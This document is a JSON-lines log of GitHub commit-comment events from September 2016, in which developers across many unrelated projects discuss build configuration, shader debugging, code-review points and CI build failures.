{"id":"4631956894","type":"CommitCommentEvent","actor":{"login":"zanderso"},"repo":{"name":"dart-lang/sdk"},"payload":{"comment":{"id":19210650,"position":4,"line":205,"path":"runtime/vm/BUILD.gn","commit_id":"b29788329baab1183f6e430bc2cf3c4169b20621","created_at":"2016-09-28T16:49:31Z","updated_at":"2016-09-28T16:49:31Z","body":"I'm surprised that you didn't need to change this line:\r\n\r\nhttps://github.com/flutter/buildroot/blob/master/build/toolchain/gcc_toolchain.gni#L119\r\n\r\nto reference {{asmflags}} and to seed asmflags with cflags etc as is done in chromium:\r\n\r\nhttps://cs.chromium.org/chromium/src/build/config/android/BUILD.gn?q=asmflags+case:yes&sq=package:chromium&l=87&dr=C\r\n\r\nThat's what I'm having to do in the standalone VM build."}},"created_at":"2016-09-28T16:49:31Z"}
{"id":"4631956913","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19210651,"position":170,"line":330,"path":"src/PrimeTower.cpp","commit_id":"f7940498f0f685e5b8364b2e6a739995e8737e39","created_at":"2016-09-28T16:49:32Z","updated_at":"2016-09-28T16:49:32Z","body":"To do when we make a cylindrical  wipe tower (with hole wiping :P)"}},"created_at":"2016-09-28T16:49:32Z"}
{"id":"4631957331","type":"CommitCommentEvent","actor":{"login":"TheRealVira"},"repo":{"name":"TheRealVira/BugReproduction"},"payload":{"comment":{"id":19210652,"position":47,"line":31,"path":"BugReproduction/Content/Shader/P2.fx","commit_id":"a265605a7c12dd588651796edc40b72aeb0bc2cd","created_at":"2016-09-28T16:49:36Z","updated_at":"2016-09-28T16:49:36Z","body":"It kind of looks the same. There you see a random frame (captured by apitrace, using the \"gl\" API):\r\n\r\n> 8085 glDisable(cap = GL_BLEND)\r\n8086 glBlendFuncSeparate(sfactorRGB = GL_ONE, dfactorRGB = GL_ZERO, sfactorAlpha = GL_ONE, dfactorAlpha = GL_ZERO)\r\n8087 glEnable(cap = GL_DEPTH_TEST)\r\n8088 glDepthMask(flag = GL_TRUE)\r\n8089 glEnable(cap = GL_STENCIL_TEST)\r\n8090 glClear(mask = GL_DEPTH_BUFFER_BIT | GL_STENCIL_BUFFER_BIT | GL_COLOR_BUFFER_BIT)\r\n8091 glEnable(cap = GL_BLEND)\r\n8092 glBlendFuncSeparate(sfactorRGB = GL_SRC_ALPHA, dfactorRGB = GL_ONE_MINUS_SRC_ALPHA, sfactorAlpha = GL_SRC_ALPHA, dfactorAlpha = GL_ONE_MINUS_SRC_ALPHA)\r\n8093 glDisable(cap = GL_STENCIL_TEST)\r\n8094 glDisable(cap = GL_CULL_FACE)\r\n8095 glPolygonMode(face = GL_FRONT_AND_BACK, mode = GL_FILL)\r\n8096 glUseProgram(program = 1)\r\n8097 glUniform4fv(location = 0, count = 1, value = {1, 1, 0.001230469, -0.002050781})\r\n8098 glActiveTexture(texture = GL_TEXTURE0)\r\n8099 glBindTexture(target = GL_TEXTURE_2D, texture = 1)\r\n8100 glBindBuffer(target = GL_ARRAY_BUFFER, buffer = 0)\r\n8101 glBindBuffer(target = GL_ELEMENT_ARRAY_BUFFER, buffer = 0)\r\n8102 glDisableVertexAttribArray(index = 1)\r\n8103 glDisableVertexAttribArray(index = 2)\r\n8104 glVertexAttribPointer(index = 0, size = 3, type = GL_FLOAT, normalized = GL_FALSE, stride = 24, pointer = blob(84))\r\n8105 glDrawElements(mode = GL_TRIANGLES, count = 6, type = GL_UNSIGNED_SHORT, indices = blob(12))\r\n8106 glBlendFuncSeparate(sfactorRGB = GL_ONE, dfactorRGB = GL_ONE_MINUS_SRC_ALPHA, sfactorAlpha = GL_ONE, dfactorAlpha = GL_ONE_MINUS_SRC_ALPHA)\r\n8107 glDisable(cap = GL_DEPTH_TEST)\r\n8108 glDepthMask(flag = GL_FALSE)\r\n8109 glEnable(cap = GL_CULL_FACE)\r\n8110 glCullFace(mode = GL_BACK)\r\n8111 glFrontFace(mode = GL_CW)\r\n8112 glPolygonMode(face = GL_FRONT_AND_BACK, mode = GL_FILL)\r\n8113 glUseProgram(program = 4)\r\n8114 glUniform4fv(location = 0, count = 1, value = {1, 1, 0.001230469, -0.002050781})\r\n8115 glUniform4fv(location = 2, count = 4, value = {0.0025, 0, 0, -1.00125, 0, -0.004166667, 0, 1.002083, 0, 0, 1, 0, 0, 0, 0, 1})\r\n8116 glActiveTexture(texture = GL_TEXTURE0)\r\n8117 glBindTexture(target = GL_TEXTURE_2D, texture = 2)\r\n8118 glBindBuffer(target = GL_ARRAY_BUFFER, buffer = 0)\r\n8119 glBindBuffer(target = GL_ELEMENT_ARRAY_BUFFER, buffer = 0)\r\n8120 glEnableVertexAttribArray(index = 1)\r\n8121 glEnableVertexAttribArray(index = 2)\r\n8122 glVertexAttribPointer(index = 0, size = 3, type = GL_FLOAT, normalized = GL_FALSE, stride = 24, pointer = blob(84))\r\n8123 glVertexAttribPointer(index = 1, size = 4, type = GL_UNSIGNED_BYTE, normalized = GL_TRUE, stride = 24, pointer = blob(76))\r\n8124 glVertexAttribPointer(index = 2, size = 2, type = GL_FLOAT, normalized = GL_FALSE, stride = 24, pointer = blob(80))\r\n8125 glDrawElements(mode = GL_TRIANGLES, count = 6, type = GL_UNSIGNED_SHORT, indices = blob(12))\r\n8126 wglSwapBuffers(hdc = 0xa20127b9) = TRUE\r\n\r\nThe differences are:\r\n* 8090 glClear(mask = GL_DEPTH_BUFFER_BIT | GL_STENCIL_BUFFER_BIT | GL_COLOR_BUFFER_BIT)\r\n* 8088 glDepthMask(flag = GL_TRUE)\r\n* 8120 glEnableVertexAttribArray(index = 1)\r\n* 8121 glEnableVertexAttribArray(index = 2)\r\n* 8126 wglSwapBuffers(hdc = 0xd40127d9) = TRUE\r\n\r\nThe \"glEnableVertexAttribArray.index\" makes me wonder, if  MG could set the wrong attributes? If I'm just stupid now please excuse, because that's totally a new territory for me. :see_no_evil:"}},"created_at":"2016-09-28T16:49:36Z"}
{"id":"4631958747","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19210657,"position":171,"line":331,"path":"src/PrimeTower.cpp","commit_id":"f7940498f0f685e5b8364b2e6a739995e8737e39","created_at":"2016-09-28T16:49:51Z","updated_at":"2016-09-28T16:49:51Z","body":"Part of the TODO in the prev line"}},"created_at":"2016-09-28T16:49:51Z"}
{"id":"4631962851","type":"CommitCommentEvent","actor":{"login":"tkelman"},"repo":{"name":"JuliaGeometry/GeometryTypes.jl"},"payload":{"comment":{"id":19210668,"position":null,"line":null,"path":null,"commit_id":"928605d825ac11ff7080871c65b23a8e7642692f","created_at":"2016-09-28T16:50:37Z","updated_at":"2016-09-28T16:50:37Z","body":"don't use release, use 0.4 and 0.5 separately to continue testing both"}},"created_at":"2016-09-28T16:50:37Z"}
{"id":"4631964330","type":"CommitCommentEvent","actor":{"login":"tweekmonster"},"repo":{"name":"tweekmonster/impsort.vim"},"payload":{"comment":{"id":19210673,"position":null,"line":null,"path":null,"commit_id":"39808d3c2af93429669e6fe9773be6c8d804dcd3","created_at":"2016-09-28T16:50:54Z","updated_at":"2016-09-28T16:50:54Z","body":"Accidentally referenced the wrong issue.  Actually fixes #15 "}},"created_at":"2016-09-28T16:50:54Z"}
{"id":"4631967178","type":"CommitCommentEvent","actor":{"login":"killme"},"repo":{"name":"elBukkit/MagicPlugin"},"payload":{"comment":{"id":19210681,"position":null,"line":null,"path":null,"commit_id":"5e4e9dd0e3781bddc24c9970b210d2c1fc3ad116","created_at":"2016-09-28T16:51:24Z","updated_at":"2016-09-28T16:51:24Z","body":"Ah I see, it was probably because wands are swords on AMC.\r\n```java\r\nboolean isMeleeWeapon = controller.isMeleeWeapon(itemInHand);\r\nif (isMelee && hasWand && !isMeleeWeapon) {\r\n```\r\nWouldn't this make more sense to be \"cast by default unless the wand has a special melee property\"?"}},"created_at":"2016-09-28T16:51:24Z"}
{"id":"4631967472","type":"CommitCommentEvent","actor":{"login":"mikebolt"},"repo":{"name":"tweenjs/tween.js"},"payload":{"comment":{"id":19210682,"position":null,"line":null,"path":null,"commit_id":"23074dfb946aebca6b583f89ea6f807b7e706c1b","created_at":"2016-09-28T16:51:27Z","updated_at":"2016-09-28T16:51:27Z","body":"That's bad...\n\nCan you post some more details? Did you get the error during the page load,\nor did you get it after doing a tween? Please describe how to reproduce the\nerror.\n\nI don't want to revert this because we need some way of getting the global\nobject in node, v8, and browsers alike.\n\nOn Sep 28, 2016 8:47 AM, \"thednp\" <notifications@github.com> wrote:\n\n> I don't think this is a good idea. I'm getting a stack exceeded the limit\n> error with the bind.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/tweenjs/tween.js/commit/23074dfb946aebca6b583f89ea6f807b7e706c1b#commitcomment-19209642>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACCav1Y2d3-zs5oTWQ-4PEBbROVU_ZzNks5quowQgaJpZM4KI_P7>\n> .\n>\n"}},"created_at":"2016-09-28T16:51:27Z"}
{"id":"4631967593","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19210684,"position":14,"line":54,"path":"src/utils/polygonUtils.cpp","commit_id":"433c90617e72cc5e56586fe8d7df9958e9b94c72","created_at":"2016-09-28T16:51:29Z","updated_at":"2016-09-28T16:51:29Z","body":"This is inside `getVertexInwardNormal`\r\nThat function just computes the normal on a vertex of the polygon...."}},"created_at":"2016-09-28T16:51:29Z"}
{"id":"4631967764","type":"CommitCommentEvent","actor":{"login":"vavalos4816"},"repo":{"name":"vavalos4816/miproyecto"},"payload":{"comment":{"id":19210685,"position":null,"line":null,"path":null,"commit_id":"e95a043765232dd6d634fd4fd04557c86cbc6fec","created_at":"2016-09-28T16:51:30Z","updated_at":"2016-09-28T16:51:30Z","body":"Nuevo comentario al commit."}},"created_at":"2016-09-28T16:51:30Z"}
{"id":"4631968347","type":"CommitCommentEvent","actor":{"login":"chinmaygarde"},"repo":{"name":"dart-lang/sdk"},"payload":{"comment":{"id":19210687,"position":4,"line":205,"path":"runtime/vm/BUILD.gn","commit_id":"b29788329baab1183f6e430bc2cf3c4169b20621","created_at":"2016-09-28T16:51:37Z","updated_at":"2016-09-28T16:51:37Z","body":"It's in the PR. Was waiting for this to land so I could get its SHA and\nroll the dependency.\nOn Wed, Sep 28, 2016 at 9:49 AM Zachary Anderson <notifications@github.com>\nwrote:\n\n> I'm surprised that you didn't need to change this line:\n>\n>\n> https://github.com/flutter/buildroot/blob/master/build/toolchain/gcc_toolchain.gni#L119\n>\n> to reference {{asmflags}} and to seed asmflags with cflags etc as is done\n> in chromium:\n>\n>\n> https://cs.chromium.org/chromium/src/build/config/android/BUILD.gn?q=asmflags+case:yes&sq=package:chromium&l=87&dr=C\n>\n> That's what I'm having to do in the standalone VM build.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/dart-lang/sdk/commit/b29788329baab1183f6e430bc2cf3c4169b20621#commitcomment-19210650>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AACsNZQfwDQzPikTbpCYUdXEjRiNemeKks5qupqhgaJpZM4KI-EA>\n> .\n>\n"}},"created_at":"2016-09-28T16:51:37Z"}
{"id":"4631968940","type":"CommitCommentEvent","actor":{"login":"ungdungdoan"},"repo":{"name":"ungdungdoan/QuanLyThuVien"},"payload":{"comment":{"id":19210690,"position":null,"line":null,"path":null,"commit_id":"0a6b9671395067b4d7c103613c7ce200ed382ff5","created_at":"2016-09-28T16:51:43Z","updated_at":"2016-09-28T16:51:43Z","body":"Hồ Quốc Bình_14071101"}},"created_at":"2016-09-28T16:51:43Z"}
{"id":"4631977813","type":"CommitCommentEvent","actor":{"login":"gavinking"},"repo":{"name":"ceylon/ceylon"},"payload":{"comment":{"id":19210702,"position":null,"line":null,"path":null,"commit_id":"3c75c29149f1f57aecd3915c084a7b58bc761207","created_at":"2016-09-28T16:53:17Z","updated_at":"2016-09-28T16:53:17Z","body":"For #6515"}},"created_at":"2016-09-28T16:53:17Z"}
{"id":"4631979169","type":"CommitCommentEvent","actor":{"login":"BagelOrb"},"repo":{"name":"Ultimaker/CuraEngine"},"payload":{"comment":{"id":19210705,"position":15,"line":55,"path":"src/utils/polygonUtils.cpp","commit_id":"433c90617e72cc5e56586fe8d7df9958e9b94c72","created_at":"2016-09-28T16:53:30Z","updated_at":"2016-09-28T16:53:30Z","body":"But then the function needs an extra argument to determine the length of the 'normalized' vector.\r\n\r\nInteger vectors cannot be unit length so well...\r\n\r\nI didn't think the extra argument was relevant to this function and so it might be applied outside anyway.\r\n\r\nWhat do you think?"}},"created_at":"2016-09-28T16:53:30Z"}
{"id":"4631988914","type":"CommitCommentEvent","actor":{"login":"thednp"},"repo":{"name":"tweenjs/tween.js"},"payload":{"comment":{"id":19210726,"position":null,"line":null,"path":null,"commit_id":"23074dfb946aebca6b583f89ea6f807b7e706c1b","created_at":"2016-09-28T16:55:14Z","updated_at":"2016-09-28T16:55:14Z","body":"It's really hard to reproduce the issue, but as soon as I figure it out, I will come post a detailed list of steps to reproduce."}},"created_at":"2016-09-28T16:55:14Z"}
{"id":"4631992827","type":"CommitCommentEvent","actor":{"login":"doowruc"},"repo":{"name":"infrabel/GNaP.Data.Scope.EntityFramework"},"payload":{"comment":{"id":19210737,"position":null,"line":null,"path":null,"commit_id":"c47e02a9c33a1e3e90b1d5d0e09215ac2f2b0234","created_at":"2016-09-28T16:55:56Z","updated_at":"2016-09-28T16:55:56Z","body":"When I try to wire up my class I get an error:\r\n\r\n\"The current type, GNaP.Data.Scope.EntityFramework.Interfaces.IDbFactory, is an interface and cannot be constructed. Are you missing a type mapping?\"\r\n\r\n"}},"created_at":"2016-09-28T16:55:56Z"}
{"id":"4632001253","type":"CommitCommentEvent","actor":{"login":"ptarjan"},"repo":{"name":"phplang/phack"},"payload":{"comment":{"id":19210757,"position":null,"line":null,"path":null,"commit_id":"dc6af0a76e47f34184a625d7edc1977e2530635e","created_at":"2016-09-28T16:57:25Z","updated_at":"2016-09-28T16:57:25Z","body":"<3"}},"created_at":"2016-09-28T16:57:25Z"}
{"id":"4632003105","type":"CommitCommentEvent","actor":{"login":"justinbmeyer"},"repo":{"name":"canjs/can-connect"},"payload":{"comment":{"id":19210763,"position":4,"line":21,"path":"all.js","commit_id":"7a98c483d619906c99cc0446faa16b61030b92ae","created_at":"2016-09-28T16:57:44Z","updated_at":"2016-09-28T16:57:44Z","body":"this needs to be exported"}},"created_at":"2016-09-28T16:57:44Z"}
{"id":"4632003713","type":"CommitCommentEvent","actor":{"login":"flibitijibibo"},"repo":{"name":"TheRealVira/BugReproduction"},"payload":{"comment":{"id":19210766,"position":47,"line":31,"path":"BugReproduction/Content/Shader/P2.fx","commit_id":"a265605a7c12dd588651796edc40b72aeb0bc2cd","created_at":"2016-09-28T16:57:50Z","updated_at":"2016-09-28T16:57:50Z","body":"At first glance it seems to make sense, but it may help to have both versions sitting side-by-side on your own machine. To get this running locally I just stripped out the MonoGame bits and linked to FNA:\r\n\r\nhttps://github.com/FNA-XNA/FNA\r\nhttps://github.com/FNA-XNA/FNA/wiki\r\n\r\nThe only content difference is that I use fxc.exe from the DirectX SDK to build shaders, rather than 2MGFX. 2MGFX uses the same recompiler though, so it shouldn't be a dramatic difference as far as content is concerned.\r\n\r\nThe parts I would focus on are which shaders are attached (i.e. look at vertex/fragment shaders for each glDrawElements in qapitrace.exe, which should be in the apitrace package for Windows) and what the uniforms looks like (which is another tab in qapitrace). Much like the draw calls they should be pretty much the same minus some minor details.\r\n\r\nIf you can nail down the exact shader being run at each draw call, and what the shader constants are for each draw, you should be able to figure out where the bug is in MonoGame without having to actually step through all the C# stuff."}},"created_at":"2016-09-28T16:57:50Z"}
{"id":"4632005330","type":"CommitCommentEvent","actor":{"login":"RongLi1986"},"repo":{"name":"haoel/leetcode"},"payload":{"comment":{"id":19210769,"position":null,"line":null,"path":null,"commit_id":"2f3a77de45a6addf7aae3fb6988e8422a7a3eb6c","created_at":"2016-09-28T16:58:07Z","updated_at":"2016-09-28T16:58:07Z","body":"It has a main function.\n\nIn leetcode, you just need to finish a solution function in class. when you submit your code, leetcode web's backend will use main function to initialize you class object and call its solution function.\n\n\n\n________________________________\nFrom: JayaMPB9 <notifications@github.com>\nSent: Wednesday, September 28, 2016 8:44:44 AM\nTo: haoel/leetcode\nSubject: Re: [haoel/leetcode] New Problem Solution\"Longest Substring with At Least K Repeating Characters\" (2f3a77d)\n\n\nHi, I am learning the very basics of programming from few of the competitive coding website, but why the way of coding in c++ is different in leetcode( I primarily use c++), means why we code without main function and why the syntax looks different and how the program is running without any main function in the program, can you mention the rules on how to code on leetcode.\n\n-\nYou are receiving this because you are subscribed to this thread.\nReply to this email directly, view it on GitHub<https://github.com/haoel/leetcode/commit/2f3a77de45a6addf7aae3fb6988e8422a7a3eb6c#commitcomment-19209600>, or mute the thread<https://github.com/notifications/unsubscribe-auth/AEHPYSlsnd_dcoRvYeSURCpFXzrWHfUrks5quotsgaJpZM4KI_Cw>.\n"}},"created_at":"2016-09-28T16:58:07Z"}
{"id":"4632009660","type":"CommitCommentEvent","actor":{"login":"mikebolt"},"repo":{"name":"tweenjs/tween.js"},"payload":{"comment":{"id":19210780,"position":null,"line":null,"path":null,"commit_id":"23074dfb946aebca6b583f89ea6f807b7e706c1b","created_at":"2016-09-28T16:58:52Z","updated_at":"2016-09-28T16:58:52Z","body":"Great, thank you.\n\nOn Sep 28, 2016 9:55 AM, \"thednp\" <notifications@github.com> wrote:\n\n> It's really hard to reproduce the issue, but as soon as I figure it out, I\n> will come post a detailed list of steps to reproduce.\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/tweenjs/tween.js/commit/23074dfb946aebca6b583f89ea6f807b7e706c1b#commitcomment-19210726>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ACCav0CJh2vNiu49S4FVzUhoMqOXeLnLks5qupv0gaJpZM4KI_P7>\n> .\n>\n"}},"created_at":"2016-09-28T16:58:52Z"}
{"id":"4632012703","type":"CommitCommentEvent","actor":{"login":"Phatcat"},"repo":{"name":"cmangos/mangos-classic"},"payload":{"comment":{"id":19210788,"position":null,"line":null,"path":null,"commit_id":"0d6707b5158025c35a3d3f78c9899b5e38af4d90","created_at":"2016-09-28T16:59:24Z","updated_at":"2016-09-28T16:59:24Z","body":"I should probably have added a comment in the code.."}},"created_at":"2016-09-28T16:59:24Z"}
{"id":"4632016864","type":"CommitCommentEvent","actor":{"login":"KrzysztofCwalina"},"repo":{"name":"dotnet/corefxlab"},"payload":{"comment":{"id":19210792,"position":null,"line":null,"path":null,"commit_id":"292ea78eecb4b6ec7cc35d7e4c59a010cf59fd54","created_at":"2016-09-28T17:00:07Z","updated_at":"2016-09-28T17:00:07Z","body":"@mgravell, thanks for looking into the design and feedback.\r\nI will review GetEnumerator. Its ctor boxes the collection and do interface dispatch and so some implementations might not want to use it.\r\nI also renamed the enumerator as you suggested. \r\n\r\nAs to Closed/Disposed, what is the scenario/need for it? In the classic collection enumerators, it's needed because the enumerator can be independent of the collection. Here the collection is the enumerator and so if it holds to scarce resources, it should have a dispose method."}},"created_at":"2016-09-28T17:00:07Z"}
{"id":"4632021340","type":"CommitCommentEvent","actor":{"login":"v4hn"},"repo":{"name":"Jntzko/moveit_msgs"},"payload":{"comment":{"id":19210801,"position":27,"line":27,"path":"srv/PlanGrasps.srv","commit_id":"c02c0b599aa2632b3361f1e6cc2eb942247dd956","created_at":"2016-09-28T17:00:50Z","updated_at":"2016-09-28T17:00:50Z","body":"doesn't it make sense to replace the `error_code` by a `MoveItErrorCodes` message?"}},"created_at":"2016-09-28T17:00:50Z"}
{"id":"4632024753","type":"CommitCommentEvent","actor":{"login":"Lakshya1605"},"repo":{"name":"skirpichev/diofant"},"payload":{"comment":{"id":19210807,"position":null,"line":null,"path":null,"commit_id":"7c3ef1598eb000a4c115508693e1cc56128d14db","created_at":"2016-09-28T17:01:26Z","updated_at":"2016-09-28T17:01:26Z","body":"Don't you think this is specific only to this issue ...even limit(Rational(-3,4)**x,x,oo) is not working"}},"created_at":"2016-09-28T17:01:26Z"}
{"id":"4632028136","type":"CommitCommentEvent","actor":{"login":"jerichoi224"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19210815,"position":74,"line":31,"path":"src/window_draw.py","commit_id":"eab1ee2134ca94cac4e349f71fa5c3dff54a6054","created_at":"2016-09-28T17:02:01Z","updated_at":"2016-09-28T17:02:01Z","body":"oh,, right.. start used to be key-height, but I just change it."}},"created_at":"2016-09-28T17:02:01Z"}
{"id":"4632030284","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19210817,"position":null,"line":null,"path":null,"commit_id":"238b61c80357e4c23cfbc8c032b80736165c12ea","created_at":"2016-09-28T17:02:23Z","updated_at":"2016-09-28T17:02:23Z","body":"MakeWebKitWork (kbenne) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-238b61c80357e4c23cfbc8c032b80736165c12ea-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-238b61c80357e4c23cfbc8c032b80736165c12ea-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-28T17:02:23Z"}
{"id":"4632030781","type":"CommitCommentEvent","actor":{"login":"SimonDanisch"},"repo":{"name":"SimonDanisch/FixedSizeArrays.jl"},"payload":{"comment":{"id":19210820,"position":null,"line":null,"path":null,"commit_id":"bee7d982e3622e5b107fbd3be07758d5925c3ea0","created_at":"2016-09-28T17:02:28Z","updated_at":"2016-09-28T17:02:28Z","body":"Why put pressure on travis? It stops quite early as well ;)"}},"created_at":"2016-09-28T17:02:28Z"}
{"id":"4632031062","type":"CommitCommentEvent","actor":{"login":"sdaftuar"},"repo":{"name":"sdaftuar/bitcoin"},"payload":{"comment":{"id":19210821,"position":5,"line":5288,"path":"src/main.cpp","commit_id":"d990722b56f02f3272c49eeef4c952992bd9efaa","created_at":"2016-09-28T17:02:31Z","updated_at":"2016-09-28T17:02:31Z","body":"yep, I'll push a fix."}},"created_at":"2016-09-28T17:02:31Z"}
{"id":"4632032247","type":"CommitCommentEvent","actor":{"login":"astec"},"repo":{"name":"driftyco/ionic"},"payload":{"comment":{"id":19210825,"position":null,"line":null,"path":null,"commit_id":"d924a7b209e1210b12363280d814646c18904318","created_at":"2016-09-28T17:02:43Z","updated_at":"2016-09-28T17:02:43Z","body":"@danbucholtz what version of NodeJS should we use? https://github.com/driftyco/ionic-site/issues/794"}},"created_at":"2016-09-28T17:02:43Z"}
{"id":"4632032347","type":"CommitCommentEvent","actor":{"login":"pskhodad"},"repo":{"name":"driftyco/ionic2-app-base"},"payload":{"comment":{"id":19210827,"position":null,"line":null,"path":null,"commit_id":"23c0cc40d24d5c24049472656dc2eb171f50f00f","created_at":"2016-09-28T17:02:45Z","updated_at":"2016-09-28T17:02:45Z","body":"Thanks Justin for quick reply :). \r\nSomething similar(but not related to service workers) is overall directory structure in latest starters and new build process. \r\nOn build, www directory seems to be getting wiped and populated with modified files from src/.tmp. One of the convention I used to follow is keep few files/directories in www. Now I have to depend on assets folder to keep some of my dependencies which doesn't seem to be good idea.  "}},"created_at":"2016-09-28T17:02:45Z"}
{"id":"4632033658","type":"CommitCommentEvent","actor":{"login":"BTTech"},"repo":{"name":"BTTech/Tech"},"payload":{"comment":{"id":19210831,"position":null,"line":null,"path":null,"commit_id":"f4f990e812611216b39799bfc74f1471636b185f","created_at":"2016-09-28T17:02:59Z","updated_at":"2016-09-28T17:02:59Z","body":"Rip eyes"}},"created_at":"2016-09-28T17:02:59Z"}
{"id":"4632036747","type":"CommitCommentEvent","actor":{"login":"jerichoi224"},"repo":{"name":"SebastianJay/Wilderness"},"payload":{"comment":{"id":19210838,"position":71,"line":28,"path":"src/window_draw.py","commit_id":"eab1ee2134ca94cac4e349f71fa5c3dff54a6054","created_at":"2016-09-28T17:03:33Z","updated_at":"2016-09-28T17:03:33Z","body":"ohhhh okay, right. this was what I was looking for. I didn't know how to keep appending new empty arrays without naming them. Will change it "}},"created_at":"2016-09-28T17:03:33Z"}
{"id":"4632037150","type":"CommitCommentEvent","actor":{"login":"oztune"},"repo":{"name":"mbostock/topojson"},"payload":{"comment":{"id":19210840,"position":null,"line":null,"path":null,"commit_id":"6770d3c7d41594d17865b3bebfed3a9d2b09e0e8","created_at":"2016-09-28T17:03:37Z","updated_at":"2016-09-28T17:03:37Z","body":"This change broke our production product.\r\n\r\n@mbostock I definitely see what you mean about\r\n> you were benefitting from a bug in an earlier version\r\n\r\nBut this change breaks everything if you relied on `import topojson from 'topojson'`, which I think we can agree isn't a hard mistake to make. The fact that npm's default behavior is to use the `^` for `npm install` commands means that this update will probably break quite a few people's builds automatically.\r\n\r\nI say 'don't be right, be smart' about this one."}},"created_at":"2016-09-28T17:03:37Z"}
{"id":"4632038623","type":"CommitCommentEvent","actor":{"login":"adamnovak"},"repo":{"name":"cmarkello/toil-scripts"},"payload":{"comment":{"id":19210844,"position":66,"line":66,"path":"src/toil_scripts/vg_evaluation_pipeline/README.md","commit_id":"b2604b28f252a51d4576fb9c98fc4911ee21bfcd","created_at":"2016-09-28T17:03:53Z","updated_at":"2016-09-28T17:03:53Z","body":"Oh I see, you're overwriting output from a previous example run of the script (just chr17)."}},"created_at":"2016-09-28T17:03:53Z"}
{"id":"4632044815","type":"CommitCommentEvent","actor":{"login":"btiernay"},"repo":{"name":"icgc-dcc/dcc-storage"},"payload":{"comment":{"id":19210860,"position":5,"line":53,"path":"dcc-storage-test/pom.xml","commit_id":"9c2dbe7b131ca1eb51d2b905417833a5fc22dcc5","created_at":"2016-09-28T17:05:00Z","updated_at":"2016-09-28T17:05:00Z","body":"You updated it here."}},"created_at":"2016-09-28T17:05:00Z"}
{"id":"4632045419","type":"CommitCommentEvent","actor":{"login":"jianbin-wei"},"repo":{"name":"Parsely/pykafka"},"payload":{"comment":{"id":19210862,"position":null,"line":null,"path":null,"commit_id":"9f9e07df99ae05383724820cccb126a3e33ef2a4","created_at":"2016-09-28T17:05:08Z","updated_at":"2016-09-28T17:05:08Z","body":"The issue of that approach is that what if there is _no_ another greenlet to update the broker info?  how about it honors the retry logic?"}},"created_at":"2016-09-28T17:05:08Z"}
{"id":"4632045598","type":"CommitCommentEvent","actor":{"login":"btiernay"},"repo":{"name":"icgc-dcc/dcc-storage"},"payload":{"comment":{"id":19210863,"position":12,"line":59,"path":"dcc-storage-test/pom.xml","commit_id":"9c2dbe7b131ca1eb51d2b905417833a5fc22dcc5","created_at":"2016-09-28T17:05:10Z","updated_at":"2016-09-28T17:05:10Z","body":"And here"}},"created_at":"2016-09-28T17:05:10Z"}
{"id":"4632046400","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19210869,"position":null,"line":null,"path":null,"commit_id":"238b61c80357e4c23cfbc8c032b80736165c12ea","created_at":"2016-09-28T17:05:18Z","updated_at":"2016-09-28T17:05:18Z","body":"MakeWebKitWork (kbenne) - x86_64-Linux-Ubuntu-14.04-clang-3.5: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-238b61c80357e4c23cfbc8c032b80736165c12ea-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-238b61c80357e4c23cfbc8c032b80736165c12ea-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-28T17:05:18Z"}
{"id":"4632046771","type":"CommitCommentEvent","actor":{"login":"csguth"},"repo":{"name":"eclufsc/ophidian"},"payload":{"comment":{"id":19210870,"position":18,"line":159,"path":"ophidian/parser/Lef.h","commit_id":"0893ada07db1f7db8786b0c6d8a1b68f5369dd96","created_at":"2016-09-28T17:05:22Z","updated_at":"2016-09-28T17:05:22Z","body":"Since you're using Pimpl, you can utilize it to hide all the private members  (sites_, layers_, macros_) and functions (if apply)."}},"created_at":"2016-09-28T17:05:22Z"}
{"id":"4632047048","type":"CommitCommentEvent","actor":{"login":"danbucholtz"},"repo":{"name":"driftyco/ionic"},"payload":{"comment":{"id":19210871,"position":null,"line":null,"path":null,"commit_id":"d924a7b209e1210b12363280d814646c18904318","created_at":"2016-09-28T17:05:24Z","updated_at":"2016-09-28T17:05:24Z","body":"4.6, whatever Node recommends, the LTS version"}},"created_at":"2016-09-28T17:05:24Z"}
